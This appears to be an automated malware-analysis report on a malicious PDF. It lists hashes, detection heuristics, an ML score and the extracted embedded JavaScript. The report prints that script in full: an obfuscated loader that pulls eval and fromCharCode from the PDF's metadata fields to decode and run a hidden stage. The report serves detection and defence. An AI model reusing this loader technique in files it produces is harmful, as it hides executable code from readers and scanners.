Malicious PDF — malware analysis report

Static analysis result for SHA-256 f44cda99d8a608c9…

Verdict: MALICIOUS
File type: PDF
Size: 17.8 KB
Created: 2011-72-51 03:25:00
Authoring application: String.fromCharCode
First seen: 2026-05-09
MD5: c41731f84bfc5aa258d04365ba1fc848
SHA-1: c86dbb29476393ccf2ee72e9d7343d3662a13816
SHA-256: f44cda99d8a608c9f3b2605989351ef3f57fc48e1e3849db1c3f90230a36658f
Risk Score: 154

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, flagged by multiple heuristics including ML_NYX_PDF_MALICIOUS. The JavaScript stream, named javascript_obj0001_000.js, is obfuscated using String.fromCharCode, indicating an attempt to hide its malicious functionality. The primary intent appears to be the execution of arbitrary code, likely to download and run a secondary payload.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (4)

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) [severity: high; CVE related; rule: PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER]
    PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family: a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action [severity: low; 2 related findings; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    /Producer (String.fromCharCode)
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0001_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 1 at offset 0x4520
Size: 338 bytes
SHA-256: 597c879cabcf22d0424be9c63beb0501a2d2f4dbe7869dcf11d85c7a1620e88b
Preview script (first 1,000 lines of the extracted script):
var w = 4;
var rvim = this.title.replace(/w/g,'*w,');
rvim = rvim.replace(/t/g,'2');
rvim=rvim.substr(0,rvim.length-2) + ']';
bnghc=function(){return this}();
gau=bnghc[this.subject];
pssw=gau(this.producer);
zcid = gau(rvim);
var s = '';
for (i = 0; i < zcid.length; i++) {
	tnnbp = zcid[i];
	s += pssw(tnnbp);
}
gau(s);